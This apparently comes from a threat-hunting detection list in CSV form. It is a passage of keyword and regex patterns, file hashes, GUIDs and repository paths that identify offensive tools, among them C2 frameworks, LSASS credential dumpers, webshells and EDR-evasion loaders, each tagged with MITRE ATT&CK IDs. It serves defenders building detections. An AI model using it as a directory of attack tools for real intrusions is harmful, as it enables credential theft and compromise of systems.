tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0f2d3c56a917f455906ba339ee8058b5f89138b8605b673eb669c1c6d0bebb5e*",".{0,1000}0f2d3c56a917f455906ba339ee8058b5f89138b8605b673eb669c1c6d0bebb5e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036*",".{0,1000}0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875*",".{0,1000}0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*0f62d209e39c648d15f268c68056e5f309d5eb6c7b0eff890f5ccaf9a0e12b96*",".{0,1000}0f62d209e39c648d15f268c68056e5f309d5eb6c7b0eff890f5ccaf9a0e12b96.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965*",".{0,1000}0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0f84fb1ee028a12de7b7dfd282528b61ee8f248d8f4a6ea1ba8ea186dc0a06a0*",".{0,1000}0f84fb1ee028a12de7b7dfd282528b61ee8f248d8f4a6ea1ba8ea186dc0a06a0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0fa2d98ba9b3da4ccc9fbc07e0e9f29aea12fe878ad83dd0c8c83564849433e4*",".{0,1000}0fa2d98ba9b3da4ccc9fbc07e0e9f29aea12fe878ad83dd0c8c83564849433e4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*",".{0,1000}0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*0fd11529bb961c342b925e156dbda40de75d4d9e823da6136ecb849b74b81e6a*",".{0,1000}0fd11529bb961c342b925e156dbda40de75d4d9e823da6136ecb849b74b81e6a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0FE0D049-F352-477D-BCCD-ACBF7D4F6F15*",".{0,1000}0FE0D049\-F352\-477D\-BCCD\-ACBF7D4F6F15.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","0","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*0vercl0k/udmp-parser*",".{0,1000}0vercl0k\/udmp\-parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*0x00-0x00*",".{0,1000}0x00\-0x00.{0,1000}","offensive_tool_keyword","Github Username","Github pentester username with lots of different exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/0x00-0x00","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0x00G/NiceRAT*",".{0,1000}0x00G\/NiceRAT.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*0x09AL/DNS-Persist*",".{0,1000}0x09AL\/DNS\-Persist.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*0x09AL/IIS-Raid*",".{0,1000}0x09AL\/IIS\-Raid.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 0x00*",".{0,1000}0x4d,\s0x44,\s0x4d,\s0x50,\s0x93,\s0xa7,\s0x00,\s0x00.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 0x00*",".{0,1000}0x4d,\s0x44,\s0x4d,\s0x50,\s0x93,\s0xa7,\s0x00,\s0x00.{0,1000}","offensive_tool_keyword","nanodump","nanodump string minidump","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*0x9999997B3deF7b69c09D7a9CA65E5242fb04a764*",".{0,1000}0x9999997B3deF7b69c09D7a9CA65E5242fb04a764.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*0xb4, 0x27, 0xb4, 0x97, 0xb1, 0xa5, 0xf3, 0x45, 0x68, 0x30, 0x3, 0x10, 0x74, 0x3c, 0x2, 0x0, 0x21, 0x7a, 0x4b, 0x8a, 0x12, 0x7b, 0xc5, 0x1a, 0xf, 0x7f, 0xf8, 0x13, 0x55, 0x7b, 0xce, 0x3a, 0x10, 0xa, 0xca, 0x47, 0x3c, 0x18, 0x5e, 0xc0, 0x78, 0x30, 0x15, 0x46, 0xfa, 0x6, 0x79, 0xaf, 0x9b, 0x4f, 0x20, 0x31, 0x31, 0x69, 0x48, 0x71, 0x83, 0x88, 0x38, 0x2d, 0x51, 0x90, 0x95, 0xdf, 0x28, 0x19, 0x26, 0x7b, 0xc5, 0x1a, 0x4f, 0xbc, 0x31, 0x7d, 0x5, 0x32, 0x95, 0xe3, 0xb0, 0xca, 0x41, 0x35, 0x6c, 0x18, 0xd4, 0xb7, 0x46, 0x1d, 0x10, 0x76, 0xe3, 0x1e, 0xc3, 0x27, 0x2f, 0x37, 0xca, 0xd, 0x13, 0xc, 0x69, 0xe0, 0xa1, 0x17, 0x7d, 0x93, 0x99, 0x10, 0xfc, 0x6, 0xf2, 0x10, 0x76, 0xe5, 0x3, 0x79, 0xa6, 0x7f, 0x42, 0x81, 0xe1, 0x72, 0x84, 0xa1, 0x3d, 0x3, 0x40, 0xf4, 0x54, 0xb0, 0x24, 0x86, 0x7e, 0x79*",".{0,1000}0xb4,\s0x27,\s0xb4,\s0x97,\s0xb1,\s0xa5,\s0xf3,\s0x45,\s0x68,\s0x30,\s0x3,\s0x10,\s0x74,\s0x3c,\s0x2,\s0x0,\s0x21,\s0x7a,\s0x4b,\s0x8a,\s0x12,\s0x7b,\s0xc5,\s0x1a,\s0xf,\s0x7f,\s0xf8,\s0x13,\s0x55,\s0x7b,\s0xce,\s0x3a,\s0x10,\s0xa,\s0xca,\s0x47,\s0x3c,\s0x18,\s0x5e,\s0xc0,\s0x78,\s0x30,\s0x15,\s0x46,\s0xfa,\s0x6,\s0x79,\s0xaf,\s0x9b,\s0x4f,\s0x20,\s0x31,\s0x31,\s0x69,\s0x48,\s0x71,\s0x83,\s0x88,\s0x38,\s0x2d,\s0x51,\s0x90,\s0x95,\s0xdf,\s0x28,\s0x19,\s0x26,\s0x7b,\s0xc5,\s0x1a,\s0x4f,\s0xbc,\s0x31,\s0x7d,\s0x5,\s0x32,\s0x95,\s0xe3,\s0xb0,\s0xca,\s0x41,\s0x35,\s0x6c,\s0x18,\s0xd4,\s0xb7,\s0x46,\s0x1d,\s0x10,\s0x76,\s0xe3,\s0x1e,\s0xc3,\s0x27,\s0x2f,\s0x37,\s0xca,\s0xd,\s0x13,\s0xc,\s0x69,\s0xe0,\s0xa1,\s0x17,\s0x7d,\s0x93,\s0x99,\s0x10,\s0xfc,\s0x6,\s0xf2,\s0x10,\s0x76,\s0xe5,\s0x3,\s0x79,\s0xa6,\s0x7f,\s0x42,\s0x81,\s0xe1,\s0x72,\s0x84,\s0xa1,\s0x3d,\s0x3,\s0x40,\s0xf4,\s0x54,\s0xb0,\s0x24,\s0x86,\s0x7e,\s0x79.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*0xbadjuju/Tokenvator*",".{0,1000}0xbadjuju\/Tokenvator.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*0xbadjuju/WheresMyImplant*",".{0,1000}0xbadjuju\/WheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*0xdarkvortex-MalwareDevelopment*",".{0,1000}0xdarkvortex\-MalwareDevelopment.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","186","65","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*0xdeadbeef*",".{0,1000}0xdeadbeef.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*0xEr3bus/PoolPartyBof*",".{0,1000}0xEr3bus\/PoolPartyBof.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*0xHossam/Killer*",".{0,1000}0xHossam\/Killer.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*0xIslamTaha/Python-Rootkit*",".{0,1000}0xIslamTaha\/Python\-Rootkit.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*0xless/slip*",".{0,1000}0xless\/slip.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","1","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*0xsp-SRD/mortar*",".{0,1000}0xsp\-SRD\/mortar.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*0xthirteen/MoveKit*",".{0,1000}0xthirteen\/MoveKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*0xthirteen/PerfExec*",".{0,1000}0xthirteen\/PerfExec.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","1","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "*0xthirteen/SharpRDP*",".{0,1000}0xthirteen\/SharpRDP.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*0xthirteen/SharpStay*",".{0,1000}0xthirteen\/SharpStay.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*0xthirteen/StayKit*",".{0,1000}0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*0xthirteen/StayKit*",".{0,1000}0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*1$a$$ Dl_lmp in *",".{0,1000}1\$a\$\$\sDl_lmp\sin\s.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*'1. Set the backdoor'*",".{0,1000}\'1\.\sSet\sthe\sbackdoor\'.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*1_FindDomain.sh*",".{0,1000}1_FindDomain\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*10119f906ce65acf48767f222524685945f3c25e8531bad35ad485c6e549ccc1*",".{0,1000}10119f906ce65acf48767f222524685945f3c25e8531bad35ad485c6e549ccc1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1029c62bf37caa9d15ae9a74c931cb9246d5c3ce33be94a0eb8e282b6249c9d8*",".{0,1000}1029c62bf37caa9d15ae9a74c931cb9246d5c3ce33be94a0eb8e282b6249c9d8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*105C2C6D-1C0A-4535-A231-80E355EFB112*",".{0,1000}105C2C6D\-1C0A\-4535\-A231\-80E355EFB112.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*107EBC1B-0273-4B3D-B676-DE64B7F52B33*",".{0,1000}107EBC1B\-0273\-4B3D\-B676\-DE64B7F52B33.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*10c9d70217e5a3915a6c09feea4110991dae5d9a1b6ae5d32c4d69dd6b6eaf50*",".{0,1000}10c9d70217e5a3915a6c09feea4110991dae5d9a1b6ae5d32c4d69dd6b6eaf50.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*10db57856d86b6cef6402c0897efb13cbd5455158f5bfb4497fed570ced9b93c*",".{0,1000}10db57856d86b6cef6402c0897efb13cbd5455158f5bfb4497fed570ced9b93c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*10de4ed7588b4a7e75d01bb69f0b602b0c298a2f9f993a6a8f4e2248031699fb*",".{0,1000}10de4ed7588b4a7e75d01bb69f0b602b0c298a2f9f993a6a8f4e2248031699fb.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*10e8116f55fa82a8b6517d2b8b2534744ef8477891d7999711dfdaf4a2297d4d*",".{0,1000}10e8116f55fa82a8b6517d2b8b2534744ef8477891d7999711dfdaf4a2297d4d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*10fcc7c086208b672ba3c954ce137842102312529937ebd2c3f8060ba70803af*",".{0,1000}10fcc7c086208b672ba3c954ce137842102312529937ebd2c3f8060ba70803af.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*10k-worst-pass.txt*",".{0,1000}10k\-worst\-pass\.txt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 